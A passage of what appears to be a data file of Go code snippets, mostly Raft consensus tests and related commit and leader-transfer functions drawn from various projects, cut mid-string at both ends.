1})\n\n\t\tn.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\t\tif g := diffu(ltoa(lead.raftLog), ltoa(follower.raftLog)); g != \"\" {\n\t\t\tt.Errorf(\"#%d: log diff:\\n%s\", i, g)\n\t\t}\n\t}\n}", "func TestLeaderTransferToUpToDateNodeFromFollower(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestRaftSingleNodeCommit(t *testing.T) {\n\tID1 := \"1\"\n\tclusterPrefix := \"TestRaftSingleNodeCommit\"\n\n\t// Create the Raft node.\n\tfsm := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn := testCreateRaftNode(cfg, newStorage())\n\tn.Start(fsm)\n\tn.ProposeInitialMembership([]string{ID1})\n\n\t// Wait it becomes leader.\n\t<-fsm.leaderCh\n\n\t// Propose 10 commands.\n\tfor i := 0; i < 10; i++ {\n\t\tn.Propose([]byte(\"I'm data-\" + strconv.Itoa(i)))\n\t}\n\n\t// These 10 proposed entries should be applied eventually.\n\tfor i := 0; i < 10; i++ {\n\t\t<-fsm.appliedCh\n\t}\n}", "func TestFollowerAppendEntries(t *testing.T) {\n\ttests := []struct {\n\t\tindex, term uint64\n\t\tents []pb.Entry\n\t\twents []pb.Entry\n\t\twunstable []pb.Entry\n\t}{\n\t\t{\n\t\t\t2, 2,\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}, {Term: 3, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t1, 1,\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 2}, {Term: 4, Index: 3}},\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}},\n\t\t\tnil,\n\t\t},\n\t\t{\n\t\t\t0, 0,\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t\t[]pb.Entry{{Term: 3, Index: 1}},\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append([]pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}})\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index, Entries: tt.ents})\n\n\t\tif g := r.raftLog.allEntries(); !reflect.DeepEqual(g, tt.wents) {\n\t\t\tt.Errorf(\"#%d: ents = %+v, want %+v\", i, g, tt.wents)\n\t\t}\n\t\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, tt.wunstable) {\n\t\t\tt.Errorf(\"#%d: unstableEnts = %+v, want %+v\", i, g, tt.wunstable)\n\t\t}\n\t}\n}", "func TestCommitAfterRemoveNode(t *testing.T) {\n\t// Create a cluster with two nodes.\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2}, 5, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\n\t// Begin to remove the second node.\n\tcc := pb.ConfChange{\n\t\tType: pb.ConfChangeRemoveNode,\n\t\tReplicaID: 2,\n\t}\n\tccData, err := cc.Marshal()\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tr.Step(pb.Message{\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{\n\t\t\t{Type: pb.EntryConfChange, Data: ccData},\n\t\t},\n\t})\n\t// Stabilize the log and make sure nothing is committed yet.\n\tif ents := nextEnts(r, s); len(ents) > 0 {\n\t\tt.Fatalf(\"unexpected committed entries: %v\", ents)\n\t}\n\tccIndex := r.raftLog.lastIndex()\n\n\t// While the config change is pending, make another proposal.\n\tr.Step(pb.Message{\n\t\tType: pb.MsgProp,\n\t\tEntries: []pb.Entry{\n\t\t\t{Type: pb.EntryNormal, Data: []byte(\"hello\")},\n\t\t},\n\t})\n\n\t// Node 2 acknowledges the config change, committing it.\n\tr.Step(pb.Message{\n\t\tType: pb.MsgAppResp,\n\t\tFrom: 2,\n\t\tIndex: ccIndex,\n\t})\n\tents := nextEnts(r, s)\n\tif len(ents) != 2 {\n\t\tt.Fatalf(\"expected two committed entries, got %v\", ents)\n\t}\n\tif ents[0].Type != pb.EntryNormal || ents[0].Data != nil {\n\t\tt.Fatalf(\"expected ents[0] to be empty, but got %v\", ents[0])\n\t}\n\tif ents[1].Type != pb.EntryConfChange {\n\t\tt.Fatalf(\"expected ents[1] to be EntryConfChange, got %v\", ents[1])\n\t}\n\n\t// Apply the config change. This reduces quorum requirements so the\n\t// pending command can now commit.\n\tr.removeNode(2)\n\tents = nextEnts(r, s)\n\tif len(ents) != 1 || ents[0].Type != pb.EntryNormal ||\n\t\tstring(ents[0].Data) != \"hello\" {\n\t\tt.Fatalf(\"expected one committed EntryNormal, got %v\", ents)\n\t}\n}", "func TestStartAsFollower(t *testing.T) {\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tif r.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateFollower)\n\t}\n}", "func TestCannotCommitWithoutNewTermEntry(t *testing.T) {\n\ttt := newNetwork(nil, nil, nil, nil, nil)\n\tdefer tt.closeAll()\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\t// 0 cannot reach 2,3,4\n\ttt.cut(1, 3)\n\ttt.cut(1, 4)\n\ttt.cut(1, 5)\n\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\ttt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tsm := tt.peers[1].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\t// network recovery\n\ttt.recover()\n\t// avoid committing ChangeTerm proposal\n\ttt.ignore(pb.MsgApp)\n\n\t// elect 2 as the new leader with term 2\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgHup})\n\n\t// no log entries from previous term should be committed\n\tsm = tt.peers[2].(*raft)\n\tif sm.raftLog.committed != 1 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 1)\n\t}\n\n\ttt.recover()\n\t// send heartbeat; reset wait\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgBeat})\n\t// append an entry at current term\n\ttt.send(pb.Message{From: 2, To: 2, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\t// expect the committed to be advanced\n\tif sm.raftLog.committed != 5 {\n\t\tt.Errorf(\"committed = %d, want %d\", sm.raftLog.committed, 5)\n\t}\n}", "func TestStep0Committee(t *testing.T) {\n\tassert.NotPanics(t, func() {\n\t\tp, ks := consensus.MockProvisioners(10)\n\t\th := committee.NewHandler(ks[0], *p)\n\t\th.AmMember(1, 0, 10)\n\t})\n}", "func TestLeaderStartReplication(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\n\tents := []pb.Entry{{Data: []byte(\"some data\")}}\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: ents})\n\n\tif g := r.raftLog.lastIndex(); g != li+1 {\n\t\tt.Errorf(\"lastIndex = %d, want %d\", g, li+1)\n\t}\n\tif g := r.raftLog.committed; g != li {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3}, Term: 1, Type: pb.MsgApp, Index: li, LogTerm: 1, Entries: wents, Commit: li},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %+v, want %+v\", msgs, wmsgs)\n\t}\n\tif g := r.raftLog.unstableEntries(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"ents = %+v, want %+v\", g, wents)\n\t}\n}", "func (f *Ocean) PutEntry(entry string, result *responses.Result) error {\n // PutEntry can be called by the client while it is searching\n // for the leader. If so, respond with leader information\n if raft.Role != spec.LEADER {\n log.Printf(\"[PUTENTRY]: REDIRECTING client to leader at %d:%s\", raft.LeaderId, self.MemberMap[raft.LeaderId].IP)\n *result = responses.Result{\n Data: fmt.Sprintf(\"%d,%s\", raft.LeaderId, self.MemberMap[raft.LeaderId].IP),\n Success: false,\n Error: responses.LEADERREDIRECT,\n }\n return nil\n }\n log.Printf(\"[PUTENTRY]: BEGINNING PutEntry() FOR: %s\", tr(entry, 20))\n\n entryCh := make(chan *responses.Result)\n commCh := make(chan *responses.Result)\n\n // Add new entry to log for processing\n entries <- entryC{entry, entryCh}\n\n select {\n case r := <-entryCh:\n r.Entry = entry\n if r.Success {\n // The entry was successfully processed.\n // Now apply to our own state.\n // - The program will explode if the state application fails.\n commits <- commitC{r.Index, commCh}\n *result = *<-commCh\n }\n case <-time.After(time.Second * time.Duration(config.C.RPCTimeout)):\n config.LogIf(fmt.Sprintf(\"[PUTENTRY]: PutEntry timed out waiting for quorum\"), config.C.LogPutEntry)\n *result = responses.Result{Term: raft.CurrentTerm, Success: false}\n }\n\n return nil\n}", "func TestFileEntry(t *testing.T) {\n\tstores := []struct {\n\t\tname string\n\t\tfixture func() (bundle *fileEntryTestBundle, cleanup func())\n\t}{\n\t\t{\"LocalFileEntry\", fileEntryLocalFixture},\n\t}\n\n\ttests := []func(require *require.Assertions, bundle *fileEntryTestBundle){\n\t\ttestCreate,\n\t\ttestCreateExisting,\n\t\ttestCreateFail,\n\t\ttestMoveFrom,\n\t\ttestMoveFromExisting,\n\t\ttestMoveFromWrongState,\n\t\ttestMoveFromWrongSourcePath,\n\t\ttestMove,\n\t\ttestLinkTo,\n\t\ttestDelete,\n\t\ttestDeleteFailsForPersistedFile,\n\t\ttestGetMetadataAndSetMetadata,\n\t\ttestGetMetadataFail,\n\t\ttestSetMetadataAt,\n\t\ttestGetOrSetMetadata,\n\t\ttestDeleteMetadata,\n\t\ttestRangeMetadata,\n\t}\n\n\tfor _, store := range stores {\n\t\tt.Run(store.name, func(t *testing.T) {\n\t\t\tfor _, test := range tests {\n\t\t\t\ttestName := runtime.FuncForPC(reflect.ValueOf(test).Pointer()).Name()\n\t\t\t\tparts := strings.Split(testName, \".\")\n\t\t\t\tt.Run(parts[len(parts)-1], func(t *testing.T) {\n\t\t\t\t\trequire := require.New(t)\n\t\t\t\t\ts, cleanup := store.fixture()\n\t\t\t\t\tdefer cleanup()\n\t\t\t\t\ttest(require, s)\n\t\t\t\t})\n\t\t\t}\n\t\t})\n\t}\n}", "func (s *raftServer) updateLeaderCommitIndex(followers []int, matchIndex *utils.SyncIntIntMap) {\n\n\tfor s.State() == LEADER {\n\t\tN := s.commitIndex.Get() + 1\n\t\tupto := N + 1\n\n\t\tfor N <= upto {\n\n\t\t\tif !s.localLog.Exists(N) {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\ti := 1\n\t\t\tfor _, f := range followers {\n\t\t\t\tif j, _ := matchIndex.Get(f); j >= N {\n\t\t\t\t\ti++\n\t\t\t\t\tupto = max(upto, j)\n\t\t\t\t}\n\t\t\t}\n\t\t\t// followers do not include Leader\n\t\t\tif entry := s.localLog.Get(N); i > (len(followers)+1)/2 && entry.Term == s.Term() {\n\t\t\t\ts.writeToLog(\"Updating commitIndex to \" + strconv.FormatInt(N, 10))\n\t\t\t\ts.commitIndex.Set(N)\n\t\t\t}\n\t\t\tN++\n\t\t}\n\t\ttime.Sleep(NICE * time.Millisecond)\n\t}\n}", "func TestSingleCommit4A(t *testing.T) {\n}", "func TestCommitConflictRace4A(t *testing.T) {\n}", "func TestLeaderTransferToUpToDateNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func TestCommitOverwrite4A(t *testing.T) {\n}", "func TestLogRecovery(t *testing.T) {\n\tpath := setupLog(\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`6ac5807c 0000000000000003 00000000000`)\n\tlog := NewLog()\n\tlog.AddCommandType(&TestCommand1{})\n\tlog.AddCommandType(&TestCommand2{})\n\tif err := log.Open(path); err != nil {\n\t\tt.Fatalf(\"Unable to open log: %v\", err)\n\t}\n\tdefer log.Close()\n\tdefer os.Remove(path)\n\n\tif err := log.Append(NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})); err != nil {\n\t\tt.Fatalf(\"Unable to append: %v\", err)\n\t}\n\n\t// Validate existing log entries.\n\tif len(log.entries) != 3 {\n\t\tt.Fatalf(\"Expected 2 entries, got %d\", len(log.entries))\n\t}\n\tif !reflect.DeepEqual(log.entries[0], NewLogEntry(log, 1, 1, &TestCommand1{\"foo\", 20})) {\n\t\tt.Fatalf(\"Unexpected entry[0]: %v\", log.entries[0])\n\t}\n\tif !reflect.DeepEqual(log.entries[1], NewLogEntry(log, 2, 1, &TestCommand2{100})) {\n\t\tt.Fatalf(\"Unexpected entry[1]: %v\", log.entries[1])\n\t}\n\tif !reflect.DeepEqual(log.entries[2], NewLogEntry(log, 3, 2, &TestCommand1{\"bat\", -5})) {\n\t\tt.Fatalf(\"Unexpected entry[2]: %v\", log.entries[2])\n\t}\n\n\t// Validate precommit log contents.\n\texpected :=\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\"\n\tactual, _ := ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n\n\t// Validate committed log contents.\n\tif err := log.SetCommitIndex(3); err != nil {\n\t\tt.Fatalf(\"Unable to partially commit: %v\", err)\n\t}\n\texpected =\n\t\t`cf4aab23 0000000000000001 0000000000000001 cmd_1 {\"val\":\"foo\",\"i\":20}`+\"\\n\" +\n\t\t`4c08d91f 0000000000000002 0000000000000001 cmd_2 {\"x\":100}`+\"\\n\" +\n\t\t`3f3f884c 0000000000000003 0000000000000002 cmd_1 {\"val\":\"bat\",\"i\":-5}`+\"\\n\"\n\tactual, _ = ioutil.ReadFile(path)\n\tif string(actual) != expected {\n\t\tt.Fatalf(\"Unexpected buffer:\\nexp:\\n%s\\ngot:\\n%s\", expected, string(actual))\n\t}\n}", "func TestUpdateEntry(t *testing.T) {\n\tif testing.Short() {\n\t\tt.SkipNow()\n\t}\n\thdbt, err := newHDBTesterDeps(t.Name(), &disableScanLoopDeps{})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\t// Test 1: try calling updateEntry with a blank host. Result should be a\n\t// host with len 2 scan history.\n\tsomeErr := errors.New(\"testing err\")\n\tentry1 := modules.HostDBEntry{\n\t\tPublicKey: types.SiaPublicKey{\n\t\t\tKey: []byte{1},\n\t\t},\n\t}\n\tentry2 := modules.HostDBEntry{\n\t\tPublicKey: types.SiaPublicKey{\n\t\t\tKey: []byte{2},\n\t\t},\n\t}\n\n\t// Try inserting the first entry. Result in the host tree should be a host\n\t// with a scan history length of two.\n\thdbt.hdb.updateEntry(entry1, nil)\n\tupdatedEntry, exists := hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 2 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Timestamp.Before(updatedEntry.ScanHistory[1].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Success || !updatedEntry.ScanHistory[1].Success {\n\t\tt.Error(\"new entry was not given success values despite a successful scan\")\n\t}\n\n\t// Try inserting the second entry, but with an error. Results should largely\n\t// be the same.\n\thdbt.hdb.updateEntry(entry2, someErr)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 2 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[0].Timestamp.Before(updatedEntry.ScanHistory[1].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif updatedEntry.ScanHistory[0].Success || updatedEntry.ScanHistory[1].Success {\n\t\tt.Error(\"new entry was not given success values despite a successful scan\")\n\t}\n\n\t// Insert the first entry twice more, with no error. There should be 4\n\t// entries, and the timestamps should be strictly increasing.\n\thdbt.hdb.updateEntry(entry1, nil)\n\thdbt.hdb.updateEntry(entry1, nil)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 4 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[1].Timestamp.Before(updatedEntry.ScanHistory[2].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[2].Timestamp.Before(updatedEntry.ScanHistory[3].Timestamp) {\n\t\tt.Error(\"new entry was not provided with a sorted scanning history\")\n\t}\n\tif !updatedEntry.ScanHistory[2].Success || !updatedEntry.ScanHistory[3].Success {\n\t\tt.Error(\"new entries did not get added with successful timestamps\")\n\t}\n\n\t// Add a non-successful scan and verify that it is registered properly.\n\thdbt.hdb.updateEntry(entry1, someErr)\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tif len(updatedEntry.ScanHistory) != 5 {\n\t\tt.Fatal(\"new entry was not given two scanning history entries\")\n\t}\n\tif !updatedEntry.ScanHistory[3].Success || updatedEntry.ScanHistory[4].Success {\n\t\tt.Error(\"new entries did not get added with successful timestamps\")\n\t}\n\n\t// Prefix an invalid entry to have a scan from more than maxHostDowntime\n\t// days ago. At less than minScans total, the host should not be deleted\n\t// upon update.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\t// Entry should still exist.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\t// Add enough entries to get to minScans total length. When that length is\n\t// reached, the entry should be deleted.\n\tfor i := len(updatedEntry.ScanHistory); i < minScans; i++ {\n\t\thdbt.hdb.updateEntry(entry2, someErr)\n\t}\n\t// The entry should no longer exist in the hostdb, wiped for being offline.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry2.PublicKey)\n\tif exists {\n\t\tt.Fatal(\"entry should have been purged for being offline for too long\")\n\t}\n\n\t// Trigger compression on entry1 by adding a past scan and then adding\n\t// unsuccessful scans until compression happens.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{Timestamp: time.Now().Add(maxHostDowntime * -1).Add(time.Hour * -1)}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfor i := len(updatedEntry.ScanHistory); i <= minScans; i++ {\n\t\thdbt.hdb.updateEntry(entry1, someErr)\n\t}\n\t// The result should be compression, and not the entry getting deleted.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"entry should not have been purged for being offline for too long\")\n\t}\n\tif len(updatedEntry.ScanHistory) != minScans {\n\t\tt.Error(\"expecting a different number of scans\", len(updatedEntry.ScanHistory))\n\t}\n\tif updatedEntry.HistoricDowntime == 0 {\n\t\tt.Error(\"host reporting historic downtime?\")\n\t}\n\tif updatedEntry.HistoricUptime != 0 {\n\t\tt.Error(\"host not reporting historic uptime?\")\n\t}\n\n\t// Repeat triggering compression, but with uptime this time.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"Entry did not get inserted into the host tree\")\n\t}\n\tupdatedEntry.ScanHistory = append([]modules.HostDBScan{{Success: true, Timestamp: time.Now().Add(time.Hour * 24 * 11 * -1)}}, updatedEntry.ScanHistory...)\n\terr = hdbt.hdb.hostTree.Modify(updatedEntry)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\thdbt.hdb.updateEntry(entry1, someErr)\n\t// The result should be compression, and not the entry getting deleted.\n\tupdatedEntry, exists = hdbt.hdb.hostTree.Select(entry1.PublicKey)\n\tif !exists {\n\t\tt.Fatal(\"entry should not have been purged for being offline for too long\")\n\t}\n\tif len(updatedEntry.ScanHistory) != minScans+1 {\n\t\tt.Error(\"expecting a different number of scans\")\n\t}\n\tif updatedEntry.HistoricUptime == 0 {\n\t\tt.Error(\"host not reporting historic uptime?\")\n\t}\n}", "func TestCommitterSuccess(t *testing.T) {\n\te := []*transformer.Envelope{\n\t\t&transformer.Envelope{},\n\t\t&transformer.Envelope{},\n\t\t&transformer.Envelope{},\n\t}\n\n\tok := false\n\tc := NewCommitter(&dumbWriter{}, func(envs []*transformer.Envelope) error {\n\t\tok = len(envs) == len(e)\n\t\tfor i := range e {\n\t\t\tok = ok && (e[i] == envs[i])\n\t\t}\n\t\treturn nil\n\t})\n\n\terr := c.Write(e...)\n\tif err != nil {\n\t\tt.Fatalf(\"unexpected error %v\", err)\n\t}\n\tif !ok {\n\t\tt.Fatal(\"commit callback not invoked correctly\")\n\t}\n}", "func TestCommitConflictRepeat4A(t *testing.T) {\n}", "func (server *Server) LeaderCommitOp(op *rpc.Operation, idx string) *common.Future {\n\treq := &rpc.CommitRequest{\n\t\tIdx: idx,\n\t\tOp: op,\n\t}\n\n\t// Async RPC to followers\n\tcommitNum := 0\n\tvar commitLock sync.Mutex\n\tcommitCv := sync.NewCond(&commitLock)\n\tfor _, addr := range server.FollowerAddrList {\n\t\tgo func(addr string) {\n\t\t\tserver.SendCommitRequest(addr, req)\n\n\t\t\tcommitLock.Lock()\n\t\t\tcommitNum++\n\t\t\tcommitLock.Unlock()\n\t\t\tcommitCv.Signal()\n\t\t}(addr)\n\t}\n\n\t// Async local commit\n\tgo func() {\n\t\tserver.CommitOp(op, idx).GetValue()\n\t\tcommitLock.Lock()\n\t\tcommitNum++\n\t\tcommitLock.Unlock()\n\t\tcommitCv.Signal()\n\t}()\n\n\tdone := common.NewFuture()\n\n\tgo func() {\n\t\tcommitLock.Lock()\n\t\tfor commitNum < server.MajorityNum {\n\t\t\tcommitCv.Wait()\n\t\t}\n\t\tcommitLock.Unlock()\n\t\tdone.SetValue(true)\n\t}()\n\n\treturn done\n}", "func CommitCaller(){\n\tfor{\n\t commitlog :=<-CommitCh\n\t\tfor i:=r.CommitIndex+1;i<=commitlog.CommitIndex && i<=commitlog.LogIndex;i++ {\n\t\t\t\tr.Log[i].IsCommitted=true\n\t\t\t\tInput_ch <- Log_Conn{r.Log[i], nil}\n\t\t\t\tr.CommitIndex=r.Log[i].SequenceNumber\n\t\t\t//r.File.WriteString(\"From Commit Caller \"+strconv.Itoa(r.CommitIndex)+\" Leader Commit \" +strconv.Itoa(commitlog.CommitIndex)+\" Log index \"+strconv.Itoa(commitlog.LogIndex))\n\t\t\t\tr.File.WriteString(strconv.Itoa(r.Log[i].Term)+\" \"+strconv.Itoa(r.Log[i].SequenceNumber)+\" \"+strings.TrimSpace(strings.Replace(string(r.Log[i].Command),\"\\n\",\" \",-1))+\" \"+\" \"+strconv.FormatBool(r.Log[i].IsCommitted))\n\t\t\t\tr.File.WriteString(\"\\t\\r\\n\");\n\t\t\t\n\t\t}\n\t}\n}", "func TestFollowerCheckMsgApp(t *testing.T) {\n\tents := []pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}}\n\ttests := []struct {\n\t\tterm uint64\n\t\tindex uint64\n\t\twindex uint64\n\t\twreject bool\n\t\twrejectHint uint64\n\t}{\n\t\t// match with committed entries\n\t\t{0, 0, 1, false, 0},\n\t\t{ents[0].Term, ents[0].Index, 1, false, 0},\n\t\t// match with uncommitted entries\n\t\t{ents[1].Term, ents[1].Index, 2, false, 0},\n\n\t\t// unmatch with existing entry\n\t\t{ents[0].Term, ents[1].Index, ents[1].Index, true, 2},\n\t\t// unexisting entry\n\t\t{ents[1].Term + 1, ents[1].Index + 1, ents[1].Index + 1, true, 2},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(ents)\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Commit: 1})\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, FromGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tType: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\t\tType: pb.MsgAppResp, Term: 2, Index: tt.windex, Reject: tt.wreject, RejectHint: tt.wrejectHint},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %+v, want %+v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func (f *FakeOutput) ExpectEntry(t testing.TB, expected *entry.Entry) 